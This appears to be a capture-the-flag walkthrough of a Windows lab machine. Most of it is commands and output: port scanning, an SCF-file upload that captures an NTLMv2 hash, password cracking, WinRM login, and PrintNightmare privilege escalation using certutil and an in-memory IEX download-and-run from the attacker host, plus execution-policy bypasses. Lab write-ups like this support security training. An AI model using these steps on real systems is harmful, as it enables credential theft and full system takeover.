$ nmap -p- -T4 -A 10.10.11.106
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-15 16:55 EDT
Nmap scan report for 10.10.11.106
Host is up (0.026s latency).
Not shown: 65531 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 6h59m55s, deviation: 0s, median: 6h59m55s
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-10-16T03:58:12
|_ start_date: 2021-10-15T16:27:47
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 192.33 seconds
Open ports from the scan: 80 IIS 10.0 (HTTP basic auth, realm "MFP Firmware Update Center", admin user), 135 MSRPC, 445 SMB (signing enabled but not required), 5985 WinRM. Note 139/NetBIOS is not among the open ports here; it is filtered like the rest.
$ nmap -sC -sV -oN nmap 10.10.11.106
Flag notes:
-sC: equivalent to --script=default
-sV: probe open ports to determine service/version info
-oN <filespec>: normal (human-readable) output to a file
-sN (null scan, not used here): sends TCP packets with no flags set; useful against some stateless filters, not for service detection
SCF file attack: SMB NTLM capture via a planted shortcut
The IIS site on port 80 is a firmware upload portal, and something on the box opens the uploaded files. An .scf file whose IconFile points at a UNC path makes Explorer fetch the icon over SMB, and to do that it authenticates to our host with the logged-on user's NTLM credentials. Upload the following as firmware.scf:
[Shell]
Command=2
IconFile=\\10.10.14.207\share\test.ico
[Taskbar]
Command=ToggleDesktop
Listener on Kali (either invocation works; the SCF points straight at our IP, so no LLMNR/NBT-NS poisoning is needed, which is why analyze mode -A, which only listens and does not poison, still gets the hash):
$ sudo responder -wrf --lm -v -I tun0
$ sudo responder -A -I tun0
(-w WPAD proxy, -r netbios wredir answers, -f fingerprint the client, --lm force an LM downgrade for XP/2003-era clients; a Windows 10 client ignores the downgrade and sends NTLMv2, as seen below.)
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.106
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash : tony::DRIVER:aaebafc4be3c49f8:7876DF0BDD05ADC3CB433FEB451DE1AC:010100000000000080856EFE05C2D70152B8CE442F2BFF3C0000000002000800300048004500380001001E00570049004E002D004700570030004B0044003200490034004B005200410004003400570049004E002D004700570030004B0044003200490034004B00520041002E0030004800450038002E004C004F00430041004C000300140030004800450038002E004C004F00430041004C000500140030004800450038002E004C004F00430041004C000700080080856EFE05C2D70106000400020000000800300030000000000000000000000000200000CF92C946336670BBCF45C1E8233EF4B06C6C6E3B75BA5AE7C6D57D46CFFE8B150A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E00320030003700000000000000000000000000
$ john -w:/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
liltony (tony)
1g 0:00:00:00 DONE (2021-10-15 20:52) 9.090g/s 297890p/s 297890c/s 297890C/s !!!!!!..eatme1
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Xeon(R) CPU E3-1575M v5 @ 3.00GHz, 13889/13953 MB (4096 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 65 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
TONY::DRIVER:aaebafc4be3c49f8:7876df0bdd05adc3cb433feb451de1ac:...:liltony (blob elided; hashcat prints the full hash line followed by the recovered password)
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: TONY::DRIVER:aaebafc4be3c49f8:7876df0bdd05adc3cb433...000000
Time.Started.....: Fri Oct 15 20:50:40 2021 (0 secs)
Time.Estimated...: Fri Oct 15 20:50:40 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 408.7 kH/s (2.66ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 32768/14344385 (0.23%)
Rejected.........: 0/32768 (0.00%)
Restore.Point....: 28672/14344385 (0.20%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: softball27 -> eatme1
Started: Fri Oct 15 20:50:28 2021
Stopped: Fri Oct 15 20:50:41 2021
$ evil-winrm -i 10.10.11.106 -u 'tony' -p 'liltony'
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tony\Documents>
*Evil-WinRM* PS C:\Users\tony\Desktop> type user.txt
b6919f936457f4e921d8842904774bc0
*Evil-WinRM* PS C:\Users\tony\Documents> ps
(output trimmed to the relevant line)
385 22 5224 14436 ...13 1168 spoolsv
The Print Spooler (spoolsv) is running. Together with the "firmware update center" theme, that points at the spooler bugs (PrintNightmare, CVE-2021-1675) for privilege escalation.
Stage tools from Kali:
$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Fetch them on the target with certutil (-urlcache -split -f writes the file into the current directory; an optional last argument names the output file):
certutil.exe -f -split -urlcache http://10.10.14.207:8000/winpeas.exe
PrintNightmare PowerShell PoC: https://github.com/calebstewart/CVE-2021-1675 (the repo's CVE-2021-1675.ps1, served here both under that name and as printnightmare.ps1)
certutil.exe -f -split -urlcache http://10.10.14.207:8000/printnightmare.ps1 printnightmare.ps1
*Evil-WinRM* PS C:\Users\tony\Downloads> import-module .\printnightmare.ps1
File C:\Users\tony\Downloads\printnightmare.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1
+ import-module .\printnightmare.ps1
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : SecurityError: (:) [Import-Module], PSSecurityException
+ FullyQualifiedErrorId : UnauthorizedAccess,Microsoft.PowerShell.Commands.ImportModuleCommand
*Evil-WinRM* PS C:\Users\tony\Downloads>
Import-Module fails because the execution policy refuses to load a .ps1 from disk. It does not apply to code that never exists as a script file, so pull the module straight into memory instead:
IEX(New-Object Net.Webclient).downloadstring('http://10.10.14.207:8000/CVE-2021-1675.ps1')
Invoke-Nightmare -NewUser "NotExistingUser" -NewPassword "p@ssword1"
Invoke-Nightmare makes the spooler load an attacker-supplied printer driver DLL as SYSTEM; the DLL creates the account given by -NewUser/-NewPassword and adds it to the local Administrators group. Check the group (NotExistingUser is ours; dedsec was already there and was not created by us):
*Evil-WinRM* PS C:\Users\tony\Downloads> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
dedsec
NotExistingUser
The command completed successfully.
*Evil-WinRM* PS C:\Users\tony\Downloads>
Alternative to the in-memory IEX: start a new PowerShell with the policy bypassed, e.g. powershell -ExecutionPolicy Bypass -File .\printnightmare.ps1 (or Set-ExecutionPolicy Bypass -Scope Process). The execution policy is a safety rail against accidental script execution, not a security boundary.
Log in as the new local admin:
kali@kali:~/0.htb/machines/Driver10.10.11.106$ evil-winrm -i 10.10.11.106 -u 'NotExistingUser' -p 'p@ssword1'
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\NotExistingUser\Documents> cd ..\..\administrator\Desktop
*Evil-WinRM* PS C:\Users\administrator\Desktop> dir
Directory: C:\Users\administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 10/16/2021 7:05 AM 34 root.txt
*Evil-WinRM* PS C:\Users\administrator\Desktop> cat root.txt
61b8662606ad94338c195222abdc99e7
*Evil-WinRM* PS C:\Users\administrator\Desktop>